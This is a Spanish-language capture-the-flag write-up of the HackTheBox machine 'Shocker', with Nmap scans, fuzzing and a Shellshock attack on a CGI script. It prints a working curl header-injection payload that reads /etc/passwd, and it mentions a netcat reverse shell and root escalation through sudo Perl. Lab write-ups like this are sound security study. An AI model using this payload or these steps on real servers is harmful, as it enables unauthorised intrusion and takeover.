WackyHacker

WackyHacker

Ethical Hacker | CTF challenge player / Red Teamer 🚩󠁵󠁳󠁴󠁸󠁿󠁵󠁳󠁴󠁸󠁿

Shocker - HackTheBox

Comence efecutando un escaneo con Nmap para identificar los puertos abiertos de la maquina.

┌─[root@parrot]─[/home/wackyhacker/Desktop]
└──╼ nmap -sS --min-rate=5000 -v -Pn -n 10.10.10.56 -oG allPorts 
Starting Nmap 7.80 ( https://nmap.org ) at 2021-07-03 15:48 CEST
Initiating SYN Stealth Scan at 15:48
Scanning 10.10.10.56 [1000 ports]
Discovered open port 80/tcp on 10.10.10.56
Discovered open port 2222/tcp on 10.10.10.56
Completed SYN Stealth Scan at 15:48, 0.47s elapsed (1000 total ports)
Nmap scan report for 10.10.10.56
Host is up (0.16s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE
80/tcp   open  http
2222/tcp open  EtherNetIP-1

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.56 seconds
           Raw packets sent: 1038 (45.672KB) | Rcvd: 1018 (40.728KB)

Tambien hice otro escaneo para verificar la version y servicio de cada puerto abierto.

┌─[root@parrot]─[/home/wackyhacker/Desktop]
└──╼ nmap -sC -sV -p80,2222 10.10.10.56 -oN targeted            
Starting Nmap 7.80 ( https://nmap.org ) at 2021-07-03 15:48 CEST
Nmap scan report for 10.10.10.56
Host is up (0.047s latency).

PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.31 seconds

Al parecer solo tenía dos puertos, empece por el servidor web, poco podía hacer en el servicio SSH, se veía esto.

primera (1)

No encontré nada, por lo que recurrí a hacer un “fuzzing” con WZFuzz.

miherramienta

Encontré un /cgi-bin/, esto parecía un shellshock en toda regla, fuzze con wfuzz, para ver si podía encontrar un script en bash.

fuzzer

Y si, encontré un script llamado user.sh, para confirmar que era un shellshock hice uso del script exploit-deface.sh y efectivamente era vulnerable a shellshock, ejecute el siguiente comando enviando una petición por GET por curl para ver si me devolvía el /etc/hosts.

┌─[root@parrot]─[/home/wackyhacker/Desktop]
└──╼ curl http://10.10.10.56/cgi-bin/user.sh -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd"

Si, me devolvió el contenido del /etc/hosts, ahora solo faltaba acceder a la máquina, me entable una reverse Shell por “netcat” por el puerto 443 y accedí.

ypadentro

ESCALADA DE PRIVILEGIOS

Ahora solo faltaba la escalada de privilegios, para ello hice sudo -l, vi que podía ejecutar Perl con privilegios root, me dirigí a gftobing para ver si podía escalar privilegios de alguna manera con Perl, al parecer si podía.

Captura de pantalla (650)

Ejecute el comando con sudo y me otorgo permisos de superusuario.

ypadentro2

Leave a comment